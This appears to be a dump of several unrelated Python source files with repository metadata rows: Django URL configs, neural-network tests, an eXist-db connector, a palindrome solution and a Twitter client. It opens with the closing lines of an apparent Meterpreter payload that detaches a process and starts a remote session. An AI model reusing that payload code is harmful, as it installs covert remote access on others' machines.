if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s)
met.run()
| 33.737226 | 134 | 0.706044 | 1,998 | 13,866 | 4.585085 | 0.12963 | 0.053488 | 0.070844 | 0.027835 | 0.470145 | 0.379762 | 0.334898 | 0.292435 | 0.259251 | 0.251173 | 0 | 0.016563 | 0.177052 | 13,866 | 410 | 135 | 33.819512 | 0.786259 | 0.016515 | 0 | 0.331445 | 0 | 0 | 0.028485 | 0.001909 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002833 | 0.028329 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd | 264 | py | Python | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-12-08T19:00:33.000Z | 2020-12-08T19:00:33.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 3 | 2021-03-30T13:47:03.000Z | 2021-09-22T19:03:46.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-04-24T14:39:03.000Z | 2020-04-24T14:39:03.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24 | 54 | 0.704545 | 33 | 264 | 5.636364 | 0.545455 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140152 | 264 | 10 | 55 | 26.4 | 0.819383 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b8187e4887ed852a5b867debdeeccee5408895fe | 7,134 | py | Python | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
def gen_vertical_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+length, x:x+2] = 1
bars.append(bar)
return bars
def gen_horizontal_bars(num):
bars = []
for _ in range(num):
x, y = np.random.randint(low=0, high=15, size=2)
length = np.random.randint(low=4, high=13)
bar = np.zeros((16, 16))
bar[y:y+2, x:x+length] = 1
bars.append(bar)
return bars
class Test(unittest.TestCase):
def test_bars(self):
# 16x16 images with bars that are 2 pixel thick
train_verticals = gen_vertical_bars(50)
train_horizontals = gen_horizontal_bars(50)
test_verticals = gen_vertical_bars(50)
test_horizontals = gen_horizontal_bars(50)
inputs = np.array(train_verticals + train_horizontals)
targets = np.array([[1, 0] for _ in train_verticals] + [[0, 1] for _ in train_horizontals])
data_set = NumericalDataSet(inputs, targets)
test_inputs = np.array(test_verticals + test_horizontals)
test_targets = np.array([[1, 0] for _ in test_verticals] + [[0, 1] for _ in test_horizontals])
test_data_set = NumericalDataSet(test_inputs, test_targets)
# 16x16 -> C(3): 14x14 -> P(2): 7x7 -> C(3): 5x5 -> P(5): 1x1
net_topo = [('c', 3, 6), ('p', 2), ('c', 3, 8), ('p', 5), ('mlp', 8, 8, 2)]
net = ConvNet(iterations=50, learning_rate=0.001, topo=net_topo)
net.train(data_set)
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, test_targets, 2)
print "Error rate: " + str(100 - (np.sum(conf_mat.diagonal()) / np.sum(conf_mat[:, :]) * 100)) + "%"
def test_mnist_digits(self):
digits, labels = imgutils.load_mnist_digits('../../data/mnist-digits/train-images.idx3-ubyte', '../../data/mnist-digits/train-labels.idx1-ubyte', 300)
targets = np.array([ nputils.vec_with_one(10, digit) for digit in labels ])
train_data_set = NumericalDataSet(np.array(digits)[:150], targets[:150])
test_data_set = NumericalDataSet(np.array(digits)[150:], targets[150:])
# 28x28 -> C(5): 24x24 -> P(2): 12x12 -> C(5): 8x8 -> P(2): 4x4 -> C(4): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 4, 16), ('mlp', 16, 16, 10)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo, activation_func=(nputils.rectifier, nputils.rectifier_deriv))
net.train(train_data_set)
try:
srlztn.save_object('../../trained/mnist_digits.cnn', net)
except:
print("serialization error")
preds = net.predict(test_data_set)
conf_mat = nputils.create_confidence_matrix(preds, targets[150:], 10)
print conf_mat
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
def test_face_recognition(self):
faces = imgutils.load_images('/home/simon/trainingdata/faces/', max_num=100)
non_faces = imgutils.load_images('/home/simon/trainingdata/nonfaces/', max_num=100)
faces_training = faces[0:50]
faces_testing = faces[50:]
non_faces_training = non_faces[0:50]
non_faces_testing = non_faces[50:]
inputs_training = np.array(faces_training + non_faces_training)
targets_training = np.array([ [1, 0] for _ in range(len(faces_training))] + [ [0, 1] for _ in range(len(non_faces_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
inputs_testing = np.array(faces_testing + non_faces_testing)
targets_testing = np.array([ [1, 0] for _ in range(len(faces_testing))] + [ [0, 1] for _ in range(len(non_faces_testing))])
data_set_testing = NumericalDataSet(inputs_testing, targets_testing)
# 24x24 -> C(5): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2): 4x4 -> C(3): 2x2 -> p(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 3, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
preds = net.predict(data_set_testing)
conf_mat = nputils.create_confidence_matrix(preds, targets_testing, 2)
num_correct = np.sum(conf_mat.diagonal())
num_all = np.sum(conf_mat[:, :])
print "Error rate: " + str(100 - (num_correct / num_all * 100)) + "% (" + str(int(num_correct)) + "/" + str(int(num_all)) + ")"
# fig = plt.figure(1)
# plt.set_cmap('gray')
# num_rows = 6x-img.shape[0]
# num_cols = 4
# fig.add_subplot(num_rows, num_cols, 1)
# plt.imshow(faces[0])
# for fm_idx in range(4):
# fig.add_subplot(num_rows, num_cols, num_cols*1 + fm_idx + 1)
# plt.imshow(convolved1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*2 + fm_idx + 1)
# plt.imshow(pooled1[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*3 + fm_idx + 1)
# plt.imshow(convolved2[fm_idx, :, :])
# fig.add_subplot(num_rows, num_cols, num_cols*4 + fm_idx + 1)
# plt.imshow(np.array([[pooled2[0, fm_idx]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 21)
# plt.imshow(np.array([[mlp_out[2][0, 0]]]), vmin=0, vmax=1)
# fig.add_subplot(num_rows, num_cols, 22)
# plt.imshow(np.array([[mlp_out[2][0, 1]]]), vmin=0, vmax=1)
#
# plt.show()
def test_smoke(self):
smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/smoke/', max_num=100)
non_smoke_imgs_training = imgutils.load_images('/home/simon/smoke/training/non-smoke/', max_num=100)
inputs_training = np.array(smoke_imgs_training + non_smoke_imgs_training)
targets_training = np.array([ [1, 0] for _ in range(len(smoke_imgs_training))] + [ [0, 1] for _ in range(len(non_smoke_imgs_training))])
data_set_training = NumericalDataSet(inputs_training, targets_training)
# 100x100 -> C(5): 96x96 -> P(2): 48x48 -> C(5): 44x44 -> P(2): 22x22 -> C(3): 20x20 -> P(2): 10x10 -> C(3): 8x8 -> P(2) 4x4 -> C(3): 2x2 -> P(2): 1x1
net_topo = [('c', 5, 8), ('p', 2), ('c', 5, 16), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('c', 3, 24), ('p', 2), ('mlp', 24, 24, 2)]
net = ConvNet(iterations=30, learning_rate=0.01, topo=net_topo)
net.train(data_set_training)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 49.2 | 158 | 0.610457 | 1,036 | 7,134 | 3.985521 | 0.179537 | 0.010656 | 0.006539 | 0.027125 | 0.554856 | 0.493582 | 0.481957 | 0.444175 | 0.392347 | 0.31969 | 0 | 0.065414 | 0.224278 | 7,134 | 145 | 159 | 49.2 | 0.680701 | 0.179282 | 0 | 0.301075 | 0 | 0 | 0.063487 | 0.044441 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075269 | null | null | 0.053763 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b819490a0e749fdb6fa33717dab9405f34226e11 | 2,747 | py | Python | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | null | null | null | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 23 | 2017-08-25T16:48:57.000Z | 2022-02-16T00:55:42.000Z | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 13 | 2017-07-03T09:15:36.000Z | 2021-07-02T07:43:10.000Z | import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64
class XdbException(Exception):
'''Exist db connector exception'''
class Connector:
def __init__(self, url, user, password):
self.url = url
self.auth = HTTPBasicAuth(user, password)
'''
Create collection
'''
def create(self, root, collection):
print "creating collection %s in %s ..." % (collection, root)
params = {
'_query': 'xmldb:create-collection("%s","%s")'% (root, collection)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
return '%s/%s'%(root, collection)
'''
chmod resource
Apply given permission on eXist-db resource,
'''
def chmod(self, resource, permissions):
print "setting permissions %s on %s "% (permissions, resource)
params = {
'_query': 'sm:chmod(xs:anyURI("%s"), "%s")'% (resource, permissions)
}
response = requests.get('%s/exist/rest/db'% (self.url), auth=self.auth, params=params)
if 200 != response.status_code:
raise XdbException
'''
Put document to collection
Collection will be created if it does not exist
'''
def upload(self, fsPath, collection):
print "storing from fs path %s to collection /%s ..." % (fsPath, collection)
_, doc = os.path.split(fsPath)
__, extension = os.path.splitext(doc)
print 'extension, doc', extension, doc
f = open(fsPath, 'r')
xqm= f.read()
f.close()
content_types = {
'.xqm': 'application/xquery',
'.xq': 'application/xquery',
'.xpl': 'application/xml',
'.xquery': 'application/xquery',
'.xml': 'application/xml',
'.xconf': 'application/xml',
'.xhtml': 'application/xml',
'.xsl': 'application/xml'
}
headers = {
'Content-Type': content_types[extension]
}
response = requests.put('%s/exist/rest/% s/%s'% (self.url, collection, doc), auth=self.auth, headers=headers, data=xqm)
if 201 != response.status_code:
print str(response)
raise XdbException
return '%s/%s' % (collection, doc)
'''
Execute a stored Xquery remotely
'''
def execute(self, document):
headers = {
'Content-Type': 'application/xquery'
}
response = requests.get('%s/exist/rest/%s'% (self.url, document), auth=self.auth, headers=headers)
if 200 != response.status_code:
raise XdbException
return response | 32.702381 | 127 | 0.581361 | 300 | 2,747 | 5.273333 | 0.316667 | 0.026549 | 0.025284 | 0.037927 | 0.230089 | 0.180152 | 0.16182 | 0.16182 | 0.128951 | 0.128951 | 0 | 0.007067 | 0.27885 | 2,747 | 84 | 128 | 32.702381 | 0.791519 | 0 | 0 | 0.209677 | 0 | 0 | 0.197395 | 0.024013 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.096774 | null | null | 0.080645 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62982d88e6406e32cdc302d54bc0206efda33025 | 957 | py | Python | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 144 | 2020-09-13T22:54:57.000Z | 2022-02-24T21:54:25.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 587 | 2020-05-06T18:55:07.000Z | 2021-09-20T13:14:53.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 523 | 2020-09-09T12:07:13.000Z | 2022-02-24T21:54:31.000Z | '''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
'''
class Solution:
def longestPalindrome(self, s: str) -> str:
res = ""
resLen = 0
for i in range(len(s)):
# odd length
l, r = i, i
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
# even length
l, r = i, i + 1
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
return res | 25.184211 | 63 | 0.378265 | 128 | 957 | 2.828125 | 0.40625 | 0.033149 | 0.033149 | 0.049724 | 0.348066 | 0.292818 | 0.292818 | 0.292818 | 0.292818 | 0.292818 | 0 | 0.040426 | 0.508882 | 957 | 38 | 64 | 25.184211 | 0.729787 | 0.250784 | 0 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62a3ad6a413be7104ebcc620eae261f63aeb9314 | 1,234 | py | Python | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.contrib.auth import views
from . import views
urlpatterns = [
#Custom login view
# url(r'^login/$', views.user_login, name='login'),
#Builtin login view
url(r'^login/$', auth_views.login, name='login'),
url(r'^edit/$', views.edit, name='edit'),
url(r'^logout/$', auth_views.logout, name='logout'),
url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
url(r'^$', views.dashboard, name='dashboard'),
url(r'^password_change/$', auth_views.password_change, name='password_change'),
url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
url(r'^register/$', views.register, name='register'),
]
| 51.416667 | 143 | 0.71799 | 175 | 1,234 | 4.817143 | 0.205714 | 0.061684 | 0.085409 | 0.080664 | 0.168446 | 0.075919 | 0 | 0 | 0 | 0 | 0 | 0.003623 | 0.105348 | 1,234 | 23 | 144 | 53.652174 | 0.759964 | 0.068882 | 0 | 0 | 0 | 0.055556 | 0.339442 | 0.157068 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
62a3b336bd6bebedcff30395fd32342d7e3cb1c2 | 10,195 | py | Python | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | 1 | 2015-11-08T12:46:28.000Z | 2015-11-08T12:46:28.000Z | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
class User(RemoteObject):
"""A Twitter account.
A User can be retrieved from ``http://twitter.com/users/show.json`` with
the appropriate ``id``, ``user_id``, or ``screen_name`` parameter.
"""
id = fields.Field()
name = fields.Field()
screen_name = fields.Field()
location = fields.Field()
description = fields.Field()
profile_image_url = fields.Field()
protected = fields.Field()
followers_count = fields.Field()
status = fields.Object('Status')
@classmethod
def get_user(cls, http=None, **kwargs):
url = '/users/show'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class DirectMessage(RemoteObject):
"""A Twitter direct message.
The authenticated user's most recent direct messages are at
``http://twitter.com/direct_messages.json``.
"""
id = fields.Field()
sender_id = fields.Field()
text = fields.Field()
recipient_id = fields.Field()
created_at = fields.Field()
sender_screen_name = fields.Field()
recipient_screen_name = fields.Field()
sender = fields.Object(User)
recipient = fields.Object(User)
def __unicode__(self):
return u"%s: %s" % (self.sender.screen_name, self.text)
class Status(RemoteObject):
"""A Twitter update.
Statuses can be fetched from
``http://twitter.com/statuses/show/<id>.json``.
"""
created_at = fields.Field()
id = fields.Field()
text = fields.Field()
source = fields.Field()
truncated = fields.Field()
in_reply_to_status_id = fields.Field()
in_reply_to_user_id = fields.Field()
in_reply_to_screen_name = fields.Field()
favorited = fields.Field()
user = fields.Object(User)
@classmethod
def get_status(cls, id, http=None):
return cls.get(urljoin(Twitter.endpoint, "/statuses/show/%d.json" % int(id)), http=http)
def __unicode__(self):
return u"%s: %s" % (self.user.screen_name, self.text)
class DirectMessageList(ListObject):
entries = fields.List(fields.Object(DirectMessage))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_messages(cls, http=None, **kwargs):
url = '/direct_messages.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def get_sent_messages(cls, http=None, **kwargs):
url = '/direct_messages/sent.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class UserList(ListObject):
entries = fields.List(fields.Object(User))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_friends(cls, http=None, **kwargs):
return cls.get_related("friends", http=http, **kwargs)
@classmethod
def get_followers(cls, http=None, **kwargs):
return cls.get_related("followers", http=http, **kwargs)
@classmethod
def get_related(cls, relation, http=None, **kwargs):
url = '/statuses/%s' % relation
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Timeline(ListObject):
entries = fields.List(fields.Object(Status))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def public(cls, http=None):
return cls.get(urljoin(Twitter.endpoint, '/statuses/public_timeline.json'), http=http)
@classmethod
def friends(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'count', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/friends_timeline.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def user(cls, http=None, **kwargs):
url = '/statuses/user_timeline'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def mentions(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/mentions.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Twitter(Http):
"""A user agent for interacting with Twitter.
Instances of this class are full ``httplib2.Http`` HTTP user agent
objects, but provide convenient convenience methods for interacting with
Twitter and its data objects.
"""
endpoint = 'http://twitter.com/'
def public_timeline(self):
return Timeline.public(http=self)
def friends_timeline(self, **kwargs):
return Timeline.friends(http=self, **kwargs)
def user_timeline(self, **kwargs):
return Timeline.user(http=self, **kwargs)
def show(self, id):
return Status.get_status(id, http=self)
def user(self, id, **kwargs):
return User.get_user(http=self, **kwargs)
def mentions(self, **kwargs):
return Timeline.mentions(http=self, **kwargs)
def friends(self, **kwargs):
return UserList.get_friends(http=self, **kwargs)
def direct_messages_received(self, **kwargs):
return DirectMessageList.get_messages(http=self, **kwargs)
def direct_messages_sent(self, **kwargs):
return DirectMessageList.get_messages_sent(http=self, **kwargs)
def show_public(twitter):
print "## Public timeline ##"
for tweet in twitter.public_timeline():
print unicode(tweet)
def show_dms(twitter):
print "## Direct messages sent to me ##"
for dm in twitter.direct_messages_received():
print unicode(dm)
def show_friends(twitter):
print "## Tweets from my friends ##"
for tweet in twitter.friends_timeline():
print unicode(tweet)
def main(argv=None):
if argv is None:
argv = sys.argv
parser = OptionParser()
parser.add_option("-u", "--username", dest="username",
help="name of user for authentication")
parser.add_option("--public", action="store_const", const=show_public,
dest="action", default=show_public,
help="Show tweets from the public timeline")
parser.add_option("--dms", action="store_const", const=show_dms,
dest="action", help="Show DMs sent to you (requires -u)")
parser.add_option("--friends", action="store_const", const=show_friends,
dest="action", help="Show your friends' recent tweets (requires -u)")
opts, args = parser.parse_args()
twitter = Twitter()
# We'll use regular HTTP authentication, so ask for a password and add
# it in the regular httplib2 way.
if opts.username is not None:
password = raw_input("Password (will echo): ")
twitter.add_credentials(opts.username, password)
try:
print
opts.action(twitter)
print
except httplib.HTTPException, exc:
# The API could be down, or the credentials on an auth-only request
# could be wrong, so show the error to the end user.
print >>sys.stderr, "Error making request: %s: %s" \
% (type(exc).__name__, str(exc))
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
| 32.059748 | 114 | 0.665326 | 1,315 | 10,195 | 5.042586 | 0.228897 | 0.039813 | 0.019907 | 0.021716 | 0.413663 | 0.345197 | 0.273262 | 0.266174 | 0.234505 | 0.219424 | 0 | 0.002122 | 0.214125 | 10,195 | 317 | 115 | 32.160883 | 0.825512 | 0.168514 | 0 | 0.307692 | 0 | 0 | 0.110418 | 0.022863 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010989 | 0.038462 | null | null | 0.049451 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62a5341859cb97bf208e99d03085417e4406b355 | 1,119 | py | Python | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG
def drox_write(exp, fp=sys.stdout):
fp.write(drox_write_string(exp) + '\n')
def drox_write_tree(exp):
if DEBUG: print("write <= " + repr(exp))
if hasattr(exp, '__tree__'):
tree = exp.__tree__()
else:
name = '.'.join(type(exp).__module__.split('.')[:2])
modulename = name + '.writer'
#print("modulename = " + modulename)
lib = importlib.import_module(modulename)
tree = lib.Writer()(exp)
if DEBUG: print("write => " + repr(tree))
return tree
def drox_write_string(exp):
tree = drox_write_tree(exp)
